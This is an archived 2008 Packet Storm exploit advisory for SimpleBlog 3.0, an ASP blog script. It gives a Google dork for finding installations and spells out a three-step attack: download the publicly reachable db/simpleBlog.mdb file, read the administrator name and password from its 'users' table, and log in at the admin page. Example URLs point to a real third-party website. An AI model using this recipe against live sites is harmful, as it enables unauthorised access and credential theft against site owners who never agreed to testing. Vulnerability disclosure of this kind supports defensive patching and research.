simpleblog-mdb.txt

2008-11-26T00:00:00
ID PACKETSTORM:72293
Type packetstorm
Reporter EL_MuHaMMeD
Modified 2008-11-26T00:00:00

Description

                                        
                                            `[»] SimpleBlog 3.0 Mdb Vulnerability  
[»]  
[»] ----------------------------------------------------------  
[»] Author : EL_MuHaMMeD  
[»]  
[»] Date : 26.11.2008  
[»]  
[»] Contact : cwelmuhammed@gmail.com  
[»]  
[»] -----------------------------------------------------------  
  
  
Script : SimpleBlog 3.0  
  
Download : http://www.8pixel.net/FetchFile.aspx?doc=simpleblog3.rar  
  
Dork : "inurl:simpleblog3"  
  
Our mdb path : db/simpleBlog.mdb  
  
Exploits :  
  
Step 1 - http://www.[target].com/[path]/simpleblog3/db/simpleBlog.mdb  
  
Step 2 - Download that mdb file and read admin name & pass from "users" table.  
  
Step 3 - http://www.[target].com/[path]/simpleblog3/admin/default.asp  
  
Example :  
  
http://www.bvrg.org.uk/simpleblog3/db/simpleBlog.mdb  
  
http://www.bvrg.org.uk/simpleblog3/admin/default.asp  
  
  
  
[»] ----------------------------------------------------------------------  
[»]  
[»] Cyber-Security.ORG - ELMuHaMMeD.COM  
[»]  
[»] ----------------------------------------------------------------------  
  
  
`